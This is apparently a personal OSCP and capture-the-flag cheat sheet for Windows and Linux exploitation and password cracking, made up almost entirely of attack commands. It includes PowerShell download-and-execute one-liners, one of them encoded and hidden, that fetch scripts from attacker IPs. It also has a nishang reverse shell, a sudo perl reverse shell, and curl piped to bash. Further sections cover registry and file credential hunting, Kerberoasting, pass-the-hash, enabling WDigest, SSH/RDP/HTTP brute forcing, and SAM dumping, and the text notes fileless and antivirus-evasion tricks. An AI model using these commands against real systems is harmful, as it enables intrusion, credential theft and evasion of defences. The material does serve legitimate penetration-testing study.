Exploitation (공격)
All you need to know about basic host-based exploitation for OSCP
Windows Exploitiation
Basic commands
Add user
net user $username $password /add
Add a user to a group
net localgroup "$groupname" $username /add
Create an local administrator account
net localgroup administrators $username /add
Find out Windows System Information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Windows Patch Status
wmic qfe get Caption,Description,HotFixID,InstalledOn
Find Plaintext Password
findstr /si password .txt
findstr /si password .xml
findstr /si password *.ini
Find all those strings in config files
dir /s pass == cred == vnc == .config
Find all passwords in all files
findstr /spin "password" . findstr /spin "password" .
Download files from Attacker Box ( Kali ) to the target via powershell
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1')
powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe
Other downloading and uploading techinques
Download Github repo: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
you need to manually edit the powershell script to run itself without -C or -command.
For example, using Invoke-PowerShellTcp.ps1 in /opt/nishang/Shells/Invoke-PowerShellTcp.ps1
Provoke this commmand maually by adding the command at the end of the powershell file.
Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444

You can copy the file to the victim and execute the command just by invoking DownloadString without Powershell –Command argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the harddisk. This technique is used to bypass signature based detection.
powershell.exe “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')"
Or you can manually invoke the command via powershell string. For example,
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444"
Also for PS version 1 and 2
PS Version 1
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"
PS Version 2
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA
Finding password files in Registry
VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows autologin
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword
Or via Powershell using Get-ItemProperty to exploit registry
PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
SNMP Paramters
reg.exe query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty
reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search for password in registry
reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
Finding credentials in Groups.xml
dir Groups.xml /s
On an atttacker box, you can decrypt Group Policy Password via:
gpp-encrpyt $password
To find more information: http://www.fuzzysecurity.com/tutorials/16.html
Finding admin credentials from AppData
dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\
Running commands as a different user by using runas command
runas /user:ACCESS\Administrator /savecred "cmd.exe C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt"
Enable RDP in Windows Target
C:\Windows\system32>netsh firewall set service remoteadmin enable
netsh firewall set service remoteadmin enable
Ok.
C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok.
Port 88 - Kerberoasting
Once you have a user shell you can start kerberoasting to get other users' credentials.
Without password
python GetUserSPNs.py -request active.htb/SVC_TGS
With password
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Then try cracking the Kerberos ticket by
john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt
Then login with psexec.py.
psexec.py [email protected]
You can choose a service for avoiding antivirus detection with --service-name.
psexec.py active.htb/Administrator:[email protected] -service-name LUALL.exe
Exploiting AD users
You should import the 'activedirectory' module first.
Import-module activedirectory
Add an AD member to a Group
add-adgroupmember -Identity "$group" -Members $member
Other Useful commands
Strings prints text strings embedded in binary files such as executables.
root@kali:~/htb/tally# strings tester.exe
!This program cannot be run in DOS mode.
Rich7J
~~~
~~~
SQLSTATE:
Message:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
~~~
~~~
Transfering file to windows
echo open $attackerip 21> ftp.txt
echo USER offsec
password>> ftp.txt
echo bin>> ftp.txt
echo GET shell.php >> ftp.txt
echo bye >> ftp.txt
Then run
ftp -v -n -s:ftp.txt
List out all schedule tasks
schtasks /query /fo LIST /v
And extra misc to check:
Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
Linux Exploitation
Spawing a intereactive TTY linux shell
python -c 'import pty; pty.spawn("/bin/sh")'
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin
Then Ctrl-Z
stty raw -echo
fg
Type reset and hit return.
Exploiting Directory
Find any writable directories
find / -type d ( -perm -g+w -or -perm -o+w ) -exec ls -adl {} \;
Or use
find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null
Finding only Executable folders
find / -perm -o x -type d 2>/dev/null
Finding Writable and executable folders
find / ( -perm -o w -perm -o x ) -type d 2>/dev/null
Find commands that allows you to run as root with no password
sudo -l
You'll see the similar result as below. As you can see, User shelly can use /usr/bin.perl as root with no password.

e.g) If you are allowed to use perl command as root, you can get a revese shell stright
sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
If this doesn't give you any hints
Check the kernel versions of the victim machines
uname -ar
cat /proc/version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
Try googling the kernel version and PE exploits to try out.
Check the bash histroy
cat .bash_history
Check the process it's running
ps aux | grep $service
Finding Plaintext Passwords in web server
Plaintext Password in /var/www/html/*.php
cat /var/www/html/config.php | grep password
In mail
cat /var/spool/mail | grep $item
Or using LinEnum.sh
LinEnum.sh -t -k password
Chekcing the service ti's running
netstat -anlp
GTFOBins
SUID
find / -perm -u=s -type f 2>/dev/null
GUID
find / -perm -g=s -type f 2>/dev/null
Authomation Tools
There are three useful automation tools that I use the most, which are
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
curl http://$attackerip/LinEnum.sh | /bin/bash
chmod +x LinEnum.sh
./LinEnum.sh
pspy
pspy is a command line tool designed to snoop on processes without need for root permissions.
Cron job watching with pspy
~/pspy (master) $ make example
Other useful commands
List out all scheduled tasks
schtasks /query /fo LIST /v
List the capability of a file
getcap -r / 2>/dev/null
Password Cracking
Belw are the Cracking methonlogy used in CTF challanges.
Creating a password list
1) You can create your own dictionary or combing two different wordlists by
cat wordlist >> wordlist2
2) Create a customised wordlist from html page
curl http://example.com > example.txt
html2dic example.txt
Or use Cewl
cewl -w createWordlist.txt -m 6 https://www.example.com
-w is the minimum password length.
Cracking Tools
To identify which hash type it is encrypte with, use either of below commands build in Kali
hash-identifier
hasid
Cracking Hash
Two Kali built-in tools can be used, hashcat and john.
Hashcat
hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule
-m= hash mode, 13100 denotes Kerberos 5 TGS-REP etype 23
-a=mode, 0 denotes straight
-o= output
John the ripper
john --wordlist=wordlist.txt dump.txt
Keepass password
keepass2john CEH.kdbx > crackthis.hash
john --wordlist=wordlist.txt crackthis.hash
Or
hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt
Putty key ppk to SSH key
puttygen my_private_key.ppk -O private-openssh -o alice.key
chmod 600 alice.key
Linux shadow password
First you need to combine the passwd file with the shadow file using the unshadow-program.
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt
Decoding Base64
cat $encodedfile | base64 --decode > decodedfile.txt
Cracking Unzip file password
fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
Convert Hex to Binary
cat hex.txt | xxd -r -p
Online Tools
Cracking password for Services
Port 22- SSH
hydra -l root -P wordlist.txt $targetip ssh
hydra -L userlist.txt -P pass.txt ssh://$targetip
Cracking Priave RSA Key
python ssh2john.py user_rsa > crackable.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt
Port 161 - SNMP
hydra -P wordlist.txt -v 102.168.0.101 snmp
Port 3389 - RDP
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101
Port 80/443 htaccess
Password protect directory with htaccess
Step 1
Create a directory that you want to password-protect. Create .htaccess tile inside that directory. Content of .htaccess:
AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user
Create .htpasswd file
htpasswd -cb .htpasswd test admin
service apache2 restart
This will now create a file called .htpasswd with the user: test and the password: admin
If the directory does not display a login-prompt, you might have to change the apache2.conf file. To this:
<Directory /var/www/html/test>
AllowOverride AuthConfig
</Directory>
Then bruteforce with
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
Tomcat Apache
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html
HTTP POST Login Form
hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*”
Pass The Hash
You can authenticate services by using a valid username and the hash value without a decrypted password.
SMB PTH
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$targetip cmd
pth-winexe -U admin/$hash:has //$targetip cmd
e.g)
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
smbclient //$targetip/C$ -U "$targetuser" --pw-nt-bash $hash
RDP PTH
By using evil-winrm https://github.com/Hackplayers/evil-winrm
evil-winrm -u "$targetuser" --hash $hash -i $targetip
By using freerdp-x11
apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:hash:hash /v:$targetip
Misc: Windows Password check in SAM
You can check two fundamental files from Windows, system registry and SAM registry.
Systemroot can be windows
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
System file can be found here
SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
Then extract the hashed password
pwdump system sam
Last updated